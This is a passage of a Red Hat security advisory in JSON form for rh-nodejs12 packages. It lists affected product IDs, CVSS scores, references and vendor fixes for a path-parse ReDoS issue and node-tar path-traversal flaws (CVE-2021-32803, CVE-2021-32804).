"7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "nodejs-path-parse: ReDoS via splitDeviceRe, splitTailRe and splitPathRe" }, { "cve": "CVE-2021-32803", "cwe": { "id": "CWE-22", "name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)" }, "discovery_date": "2021-08-04T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1990415" } ], "notes": [ { "category": "description", "text": "The npm package \"tar\" (aka node-tar) has an arbitrary File Creation/Overwrite vulnerability via insufficient symlink protection. `node-tar` aims to guarantee that any file whose location would be modified by a symbolic link is not extracted. This is, in part, achieved by ensuring that extracted directories are not symlinks. Additionally, in order to prevent unnecessary `stat` calls to determine whether a given path is a directory, paths are cached when directories are created.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-tar: Insufficient symlink protection allowing arbitrary file creation and overwrite", "title": "Vulnerability summary" }, { "category": "other", "text": "Red Hat Quay 3.3 uses an affected version of nodejs-tar. However Quay 3.3 is in extended life phase and a fix will not be delivered[1]. More recent versions of Red Hat Quay do not include nodejs-tar and are not affected.\n\n1. https://access.redhat.com/support/policy/updates/rhquay\n\nRed Hat Enterprise Linux version 8 and Red Hat Software Collection both embed node-tar in the npm command. However, npm explicitly prevents the extraction of symlink via a filter. npm might still be affected via node-gyp, if the attacker is able to control the target URL.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-32803" }, { "category": "external", "summary": "RHBZ#1990415", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1990415" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-32803", "url": "https://www.cve.org/CVERecord?id=CVE-2021-32803" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-32803", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-32803" }, { "category": "external", "summary": "https://github.com/npm/node-tar/security/advisories/GHSA-r628-mhmh-qjhw", "url": "https://github.com/npm/node-tar/security/advisories/GHSA-r628-mhmh-qjhw" } ], "release_date": "2021-08-03T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-08-26T10:18:55+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:3281" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H", "version": "3.1" }, "products": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "nodejs-tar: Insufficient symlink protection allowing arbitrary file creation and overwrite" }, { "cve": "CVE-2021-32804", "cwe": { "id": "CWE-22", "name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)" }, "discovery_date": "2021-08-04T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1990409" } ], "notes": [ { "category": "description", "text": "The npm package \"tar\" (aka node-tar) has an arbitrary File Creation/Overwrite vulnerability due to insufficient absolute path sanitization. node-tar aims to prevent extraction of absolute file paths by turning absolute paths into relative paths when the `preservePaths` flag is not set to `true`. This is achieved by stripping the absolute path root from any absolute file paths contained in a tar file.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-tar: Insufficient absolute path sanitization allowing arbitrary file creation and overwrite", "title": "Vulnerability summary" }, { "category": "other", "text": "Red Hat Quay 3.3 uses an affected version of nodejs-tar. However Quay 3.3 is in extended life phase and a fix will not be delivered[1]. More recent versions of Red Hat Quay do not include nodejs-tar and are not affected.\n\n1. https://access.redhat.com/support/policy/updates/rhquay\n\nRed Hat Enterprise Linux version 8 and Red Hat Software Collection both embed node-tar in the npm command. A specially crafted node module could create and overwrite files outside of its dedicated directory.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-32804" }, { "category": "external", "summary": "RHBZ#1990409", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1990409" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-32804", "url": "https://www.cve.org/CVERecord?id=CVE-2021-32804" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-32804", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-32804" }, { "category": "external", "summary": "https://github.com/npm/node-tar/security/advisories/GHSA-3jfq-g458-7qm9", "url": "https://github.com/npm/node-tar/security/advisories/GHSA-3jfq-g458-7qm9" } ], "release_date": "2021-08-03T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-08-26T10:18:55+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", 